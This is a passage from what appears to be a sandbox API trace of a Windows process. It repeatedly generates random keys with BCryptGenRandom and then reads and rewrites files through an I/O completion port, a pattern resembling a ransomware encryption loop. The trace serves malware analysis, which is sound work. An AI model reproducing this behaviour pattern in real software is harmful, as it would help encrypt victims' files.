CloseHandle (hObject=0x338) returned 1 [0143.832] free (_Block=0x3df0008) [0143.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.835] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x9a76, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0143.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.836] CloseHandle (hObject=0x3cc) returned 1 [0143.836] free (_Block=0x3e70008) [0143.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.839] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0143.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0143.859] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.865] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.865] free (_Block=0x3e305b8) [0143.868] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.868] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.902] free (_Block=0x1fa91d0) [0143.902] free (_Block=0x77d7a8) [0144.130] free (_Block=0x1fa90b8) [0144.130] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.130] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.289] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0xb5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0144.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.307] CloseHandle (hObject=0x170) returned 1 [0144.307] free (_Block=0x3ef0008) [0144.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.316] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.316] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.316] free (_Block=0x3e305b8) [0144.316] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.316] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.317] free (_Block=0x1fa91d0) [0144.317] free (_Block=0x1fa2ed8) [0144.317] free (_Block=0x1fa90b8) [0144.317] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.319] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xaaa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.320] CloseHandle (hObject=0x170) returned 1 [0144.320] free (_Block=0x3df0008) [0144.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.330] free (_Block=0x3e305b8) [0144.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.331] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.331] free (_Block=0x1fa91d0) [0144.331] free (_Block=0x1fa2ed8) [0144.331] free (_Block=0x1fa90b8) [0144.331] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.333] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x107e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.334] CloseHandle (hObject=0x170) returned 1 [0144.334] free (_Block=0x3df0008) [0144.334] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.344] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.344] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.344] free (_Block=0x3e305b8) [0144.344] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.344] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.344] free (_Block=0x1fa91d0) [0144.344] free (_Block=0x1fa2ed8) [0144.344] free (_Block=0x1fa90b8) [0144.344] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.346] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.347] CloseHandle (hObject=0x170) returned 1 [0144.347] free (_Block=0x3df0008) [0144.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.361] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.361] free (_Block=0x3e305b8) [0144.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.361] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.361] free (_Block=0x1fa91d0) [0144.361] free (_Block=0x1fa2ed8) [0144.361] free (_Block=0x1fa90b8) [0144.361] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.363] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.375] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfd22, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.390] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb544, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.403] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x212e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.405] CloseHandle (hObject=0x170) returned 1 [0144.405] free (_Block=0x3df0008) [0144.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.415] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.415] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.415] free (_Block=0x3e305b8) [0144.415] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.415] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.416] free (_Block=0x1fa91d0) [0144.416] free (_Block=0x1fa2ed8) [0144.416] free (_Block=0x1fa90b8) [0144.416] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.420] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.432] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c68, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.433] CloseHandle (hObject=0x170) returned 1 [0144.433] free (_Block=0x3df0008) [0144.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.443] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.443] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.443] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.443] free (_Block=0x3e305b8) [0144.443] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.443] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.444] free (_Block=0x1fa91d0) [0144.444] free (_Block=0x1fa2ed8) [0144.444] free (_Block=0x1fa90b8) [0144.444] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.444] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.445] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.446] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.446] CloseHandle (hObject=0x170) returned 1 [0144.447] free (_Block=0x3df0008) [0144.447] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.458] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.458] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.458] free (_Block=0x3e305b8) [0144.458] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.458] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.458] free (_Block=0x1fa91d0) [0144.458] free (_Block=0x1fa2ed8) [0144.458] free (_Block=0x1fa90b8) [0144.459] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.460] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.472] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a60, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.487] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2988, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.488] CloseHandle (hObject=0x170) returned 1 [0144.488] free (_Block=0x3df0008) [0144.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.499] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.499] free (_Block=0x3e305b8) [0144.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.500] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.500] free (_Block=0x1fa91d0) [0144.500] free (_Block=0x1fa2ed8) [0144.500] free (_Block=0x1fa90b8) [0144.500] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, 